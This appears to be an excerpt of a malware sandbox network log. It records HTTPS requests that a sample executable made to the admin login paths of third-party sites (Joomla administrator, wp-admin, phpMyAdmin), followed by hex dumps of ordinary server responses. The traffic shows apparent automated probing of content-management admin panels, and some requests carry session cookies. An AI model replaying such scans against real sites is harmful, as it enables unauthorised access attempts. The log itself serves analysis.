                                                                                                                                                                                                    2023-11-26 05:59:39 UTC4226INData Raw: 31 30 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e
                                                                                                                                                                                                    Data Ascii: 107a<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Con
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    234192.168.2.4612303.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC932OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: laravel_session=eyJpdiI6IldVSVdPNGdUR2JDN2tFR2tvcjMzVXc9PSIsInZhbHVlIjoiR29jOElPY2pHK2ZKdjF3WnkwSWljS0sxNjMyc3Rrb3RZM0hsRHU0ZU1HN05jaEV6UVQyL2RLajNSV0VZYllpU2VObUhVVEdQVDE5OHRHUlZ1czZtOWozL0FJSUNFOTFTM255UW5tbzJ2MVhrdnp3VWgrUS9abDhpN1VkSW1SdDQiLCJtYWMiOiI1NmYxZWE0YTI5ZmE1NzcxMGY4NjhmMGJkZDFlOTcyZWNiYTIyMWQ0Nzk1N2RhMzgyYzNjYjhjMzMxOTIxMjM3In0%3D; XSRF-TOKEN=eyJpdiI6IkFPalpTRG5rdmUxUmNpVVMyVW9VL0E9PSIsInZhbHVlIjoiVmN5VjBEN0doZmxEdWNNOXh2RVFoUzNjb0pHcEdNZDZ2ay9zaWladjB5bmtoMk5HcTloeWZBb0p0aXBnK2kvQTVrOHpkOW8yelBQTmYzZDN0bWQwNnFnZENVTXN5OVBIdnJwYk9TTGpCa1o5TXZaMWZkZ1ZtdXIwcXdhMjFmZlQiLCJtYWMiOiI5OGQyNjEwOGYxMmJlNjUzZDYxZTEyMjM3ZjEzMWJkM2E0NjU0NzE5MzYyYjAyMTA5ZmY5MGY3NDZkNmI4NTk1In0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.knu.ac.in/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1099INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6b 45 7a 57 56 68 31 4d 57 4a 70 54 55 78 72 62 7a 64 54 4d 48 4a 6f 56 30 35 56 4e 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6d 64 4f 63 57 46 52 53 58 64 58 56 6c 4d 72 4d 55 39 55 62 48 70 32 4f 48 63 72 5a 54 6c 6a 54 6d 52 31 4d 6d 52 6e 61 57 49 77 4e 45 4e 77 63 58 52 53 59 33 6c 4b 4b 32 56 6f 52 46 68 4a 52 54 4a 5a 56 69 74 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IkEzWVh1MWJpTUxrbzdTMHJoV05VN2c9PSIsInZhbHVlIjoiTmdOcWFRSXdXVlMrMU9UbHp2OHcrZTljTmR1MmRnaWIwNENwcXRSY3lKK2VoRFhJRTJZVitl


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    235192.168.2.46146015.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC213OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://unaj.edu.pe/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC15911INData Raw: 37 39 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 796e<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC15188INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 69
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> Bi


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    236192.168.2.461519172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC173OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC628INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC741INData Raw: 37 64 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d3b<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65
                                                                                                                                                                                                    Data Ascii: product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".concat(e
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73 69 6f 6e 5f
                                                                                                                                                                                                    Data Ascii: stTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},session_
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74 28 22 2e 22
                                                                                                                                                                                                    Data Ascii: )throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split("."
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 63 6f 6e
                                                                                                                                                                                                    Data Ascii: w new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try{con
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                                                                                    Data Ascii: ument,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator instanceo
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d 61 72 67 75
                                                                                                                                                                                                    Data Ascii: 3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=argu
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a 70 2c 62 75
                                                                                                                                                                                                    Data Ascii: gth;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:p,bu
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC1369INData Raw: 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: ,get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&argumen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    237192.168.2.46153095.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC371OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=3dbfg2bnrmlhvmjhpi48421sg2
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.beachrecruitment.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC371INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:39 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:
